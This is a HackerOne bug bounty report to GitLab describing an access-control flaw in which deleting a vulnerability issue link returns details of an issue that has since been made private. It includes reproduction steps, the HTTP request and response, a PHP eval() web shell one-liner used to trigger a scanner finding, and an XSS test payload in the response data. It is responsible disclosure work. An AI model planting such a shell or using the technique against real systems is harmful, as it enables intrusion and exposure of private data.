**[HackerOne report #1179733](https://hackerone.com/reports/1179733)** by `wi11` on 2021-04-29, assigned to @ankelly: [Report](#report) | [Attachments](#attachments) | [How To Reproduce](#how-to-reproduce) ## Report ##### Summary Hi team, At GitLab, you can link to an existing issue for a vulnerability, and the issues can be linked across groups and projects. The user can't link an issue that he can't access to. But the user can delete the issue link he has created before, and the related information about the issue will be returned when deleting, so if an issue link is created by a user and the visibility level of this issue is changed, the user can still delete this issue link to get the information about the issue that he can't access. Request ```http DELETE /api/v4/vulnerabilities/7989487/issue_links/9274 HTTP/1.1 Host: gitlab.com ``` ##### Steps to reproduce Step to reproduce You need two accounts to reproduce this. 1.As the victim, create a public project -> create an issue. 2.As the attacker, You need to have a Vulnerability Report.(if you have one, jump to Step 4) 3.As attacker -> create a project -> go to Security & Compliance -> Configuration -> Enable (SAST) -> upload a php file with code ``<?php eval($_POST['888']);?>`` to your repository -> wait for the pipeline passed -> go to Vulnerability report. 4.Go to Vulnerability report -> link issue that you create on Sept 1. (Paste the issue link) 5.Intercept the request -> remove the issue you will intercept the request like this, and send it to the repeater, **remember don't forward it otherwise it will be removed** 6.As the victim, change the project visibility to private and make some changes to the title and description on the issue that created at Step 1. 7.As the attacker sends the request, you will find that the information of the issue is returned. ##### Impact After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.) ##### What is the current *bug* behavior? When an issue link with a previously accessible issue was delete the information of the inaccessible issue was returned. ```http DELETE /api/v4/vulnerabilities/[REDACTED]/issue_links/9274 HTTP/1.1 Host: gitlab.com Connection: close Accept: application/json, text/plain, */* X-CSRF-Token: X-Requested-With: XMLHttpRequest Origin: https://gitlab.com Accept-Encoding: gzip, deflate Cookie: ``` ```http HTTP/1.1 200 OK Date: Thu, 29 Apr 2021 06:21:32 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, HEAD, POST, PUT, PATCH, DELETE, OPTIONS Access-Control-Allow-Origin: https://gitlab.com Access-Control-Expose-Headers: Link, X-Total, X-Total-Pages, X-Per-Page, X-Page, X-Next-Page, X-Prev-Page, X-Gitlab-Blob-Id, X-Gitlab-Commit-Id, X-Gitlab-Content-Sha256, X-Gitlab-Encoding, X-Gitlab-File-Name, X-Gitlab-File-Path, X-Gitlab-Last-Commit-Id, X-Gitlab-Ref, X-Gitlab-Size Access-Control-Max-Age: 7200 Cache-Control: max-age=0, private, must-revalidate Etag: W/"23a17e185fb2cd10bfa81a06e6f25d84" Vary: Origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Gitlab-Feature-Category: vulnerability_management X-Request-Id: 01F4E4M9NQCH1XTG95DP4NQGNJ X-Runtime: 0.237133 Strict-Transport-Security: max-age=31536000 Referrer-Policy: strict-origin-when-cross-origin RateLimit-Observed: 9 RateLimit-Remaining: 1991 RateLimit-Reset: 1619677352 RateLimit-ResetTime: Thu, 29 Apr 2021 06:22:32 GMT RateLimit-Limit: 2000 GitLab-LB: fe-09-lb-gprd GitLab-SV: localhost CF-Cache-Status: DYNAMIC cf-request-id: 09bde33e1e00001a5e7033d000000001 Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 64766e4368b11a5e-SIN Content-Length: 3692 {"id":9274,"vulnerability":{"id":7989487,"title":"Please do not use eval() functions","description":null,"state":"confirmed","severity":"high","confidence":"unknown","report_type":"sast","project":{"id":25475655,"description":"bug test bug test bug test bug test !!!!!'\"\u003e\u003cimg src=zqzq onerror=alert(1)\u003e","name":"easy-money-maker","name_with_namespace":"ezgama / easy-money-maker","path":"a-project","path_with_namespace":"ezgama/a-project","created_at":"2021-03-28T06:36:35.788Z"},"finding":{"id":9486278,"created_at":"2021-04-06T08:16:39.241Z","updated_at":"2021-04-06T08:16:39.500Z","severity":"high","confidence":"unknown","report_type":"sast","project_id":25475655,"scanner_id":95603,"primary_identifier_id":2065399,"project_fingerprint":"b7b70a4e7acf2a02fd311dc34504a007f757bde4","location_fingerprint":"78df993d22174e7368adc689a1ed89fb927cbfbf","uuid":"6597da14-4b91-556d-b041-7d89d74fc1fb","name":"Please do not use eval() functions","metadata_version":"14.0.0","raw_metadata":"{\"id\":\"389d0a0ec7a6b2c2e6b8da2ab910aa123ee9bf462411c4de6c9bafe8e492ac7b\",\"category\":\"sast\",\"name\":\"Please do not use eval() functions\",\"message\":\"Please do not use eval() functions\",\"description\":\"Please do not use eval() functions\",\"cve\":\"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"severity\":\"High\",\"scanner\":{\"id\":\"phpcs_security_audit\",\"name\":\"phpcs-security-audit v2\"},\"location\":{\"file\":\"mama.php\",\"start_line\":1},\"identifiers\":[{\"type\":\"phpcs_security_audit_source\",\"name\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\",\"value\":\"PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals\"}],\"remediations\":[null]}","vulnerability_id":7989487,"details":{},"description":"Please do not use eval() functions","message":"Please do not use eval() functions","solution":null,"cve":"mama.php:PHPCS_SecurityAudit.BadFunctions.NoEvals.NoEvals","location":{"file":"mama.php","start_line":1}},"resolved_on_default_branch":false,"project_default_branch":"master","author_id":8546086,"updated_by_id":null,"last_edited_by_id":null,"resolved_by_id":null,"dismissed_by_id":null,"confirmed_by_id":8546086,"start_date":null,"due_date":null,"created_at":"2021-04-06T08:16:39.453Z","updated_at":"2021-04-29T05:46:07.075Z","last_edited_at":null,"resolved_at":null,"dismissed_at":null,"confirmed_at":"2021-04-29T05:23:52.331Z"},"issue":{"id":86180604,"iid":16,"project_id":25969925,"title":"BUGSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS","description":"BUGBGUBGUBUGBUGBUGBUGSDDDDDDDDDDDDDDDDDDDDDDDDDD","state":"opened","created_at":"2021-04-29T05:57:17.615Z","updated_at":"2021-04-29T06:21:08.450Z","closed_at":null,"closed_by":null,"labels":[],"milestone":{"id":2023885,"iid":1,"group_id":11753634,"title":"group milestone","description":"","state":"active","created_at":"2021-04-29T05:10:02.829Z","updated_at":"2021-04-29T05:10:02.829Z","due_date":null,"start_date":null,"expired":null,"web_url":"https://gitlab.com/groups/dvadegroup/-/milestones/1"},"assignees":[],"author":{"id":8696838,"name":"dva dva","username":"dva_dva","state":"active","avatar_url":"https://assets.gitlab-static.net/uploads/-/system/user/avatar/8696838/avatar.png","web_url":"https://gitlab.com/dva_dva"},"assignee":null,"user_notes_count":0,"merge_requests_count":0,"upvotes":0,"downvotes":0,"due_date":"2021-08-20","confidential":true,"discussion_locked":null,"web_url":"https://gitlab.com/dvadegroup/dvadeproject/-/issues/16","time_stats":{"time_estimate":0,"total_time_spent":0,"human_time_estimate":null,"human_total_time_spent":null},"task_completion_status":{"count":0,"completed_count":0},"weight":100,"blocking_issues_count":0},"link_type":"related"} ``` ##### What is the expected *correct* behavior? the information of the inaccessible issue should not be returned. ##### Output of checks This bug happens on GitLab.com #### Impact After an issue became inaccessible to the attacker, he still can retrieve information about the issue. (title, description, state, assignees, etc.) ## Attachments ## How To Reproduce Please add [reproducibility information] to this section: 1. 1. 1. [reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues